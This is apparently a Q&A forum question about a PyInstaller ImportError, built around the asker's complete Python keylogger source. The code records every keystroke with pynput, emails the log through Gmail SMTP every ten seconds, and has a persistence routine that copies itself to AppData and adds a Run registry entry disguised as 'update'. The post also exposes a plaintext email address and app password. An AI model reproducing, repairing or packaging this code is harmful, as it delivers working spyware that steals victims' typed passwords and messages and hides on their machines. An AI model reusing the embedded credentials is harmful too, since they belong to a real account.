# ImportError in Python with Pyinstaller

Tags: python, pyinstaller, importerror

I have made a keylogger in python that works perfectly when I run it from my development environment, the problem is that when I pass the .py file to an .exe with pyinstaller, when it runs it shows me an ImportError that I don't know how to solve.

This is the error:

```
H:\ArchInformatica\PycharmProjects\keyl\dist>main.exe
Traceback (most recent call last):
  File "main.py", line 5, in <module>
  File "H:\ArchInformatica\PycharmProjects\keyl\venv\Lib\site-packages\PyInstaller/loader/pyimod03_importers.py", line 391, in load_module
    exec(bytecode, module.__dict__)
  File "lib\site-packages\pynput\__init__.py", line 40, in <module>
  File "H:\ArchInformatica\PycharmProjects\keyl\venv\Lib\site-packages\PyInstaller/loader/pyimod03_importers.py", line 391, in load_module
    exec(bytecode, module.__dict__)
  File "lib\site-packages\pynput\keyboard\__init__.py", line 31, in <module>
  File "lib\site-packages\pynput\_util\__init__.py", line 82, in backend
ImportError
[8672] Failed to execute script main
```

And this is my code:

```
# coding=utf-8

import smtplib
import time
import pynput.keyboard
import threading
import os
import shutil
import sys
import subprocess

class Keylogger:

    def __init__(self, intervalo, email, contrasena):
        #self.convertirPersistente()
        self.mensaje = 'Inicio'
        self.intervalo = intervalo
        self.email = email
        self.contrasena = contrasena

    def adjuntarAlMensaje(self, teclaActual):
        self.mensaje = self.mensaje + teclaActual

    def procesarTecla(self, tecla):
        try:
            teclaActual = str(tecla.char)
        except AttributeError:
            if tecla == tecla.space:
                teclaActual = ' '
            else:
                teclaActual = ' (' + str(tecla) + ') '
        finally:
            self.adjuntarAlMensaje(teclaActual)

    def informe(self):
        hiloMail=threading.Thread(target=self.enviarMail, args=(self.email, self.contrasena, self.mensaje,))
        hiloMail.start()
        self.mensaje = ''
        time.sleep(self.intervalo)
        self.informe()

    def enviarMail(self, email, contrasena, cuerpo):
        asunto = 'Keylogger'
        cuerpo = ('Subject: {}\n\n{}').format(asunto, cuerpo)
        servidor = smtplib.SMTP('smtp.gmail.com', 587)
        servidor.starttls()
        servidor.login(email, contrasena)
        servidor.sendmail(email, email, cuerpo)
        servidor.quit()

    def convertirPersistente(self):
        pathKeylogger=os.environ["appdata"]+"\\Keylogger.exe"
        if not os.path.exists(pathKeylogger):
            shutil.copyfile(sys.executable, pathKeylogger)
            subprocess.call('reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "'+pathKeylogger+'"', shell=True)

    def start(self):

        while True:
            try:
                keyboardListener = pynput.keyboard.Listener(on_press=self.procesarTecla)
                with keyboardListener:
                    self.informe()
                    keyboardListener.join()
            except:
                pass

keylogger=Keylogger(10,"jungloelcrack@gmail.com","wfjwcrwzvdlsulvb")
keylogger.start()
```

I tried to solve it but I can't find the way, any ideas?

Comment: Welcome to stackoverflow. Please checkout the [tour]. What was `pyinstaller` command that you used to make your `.exe`?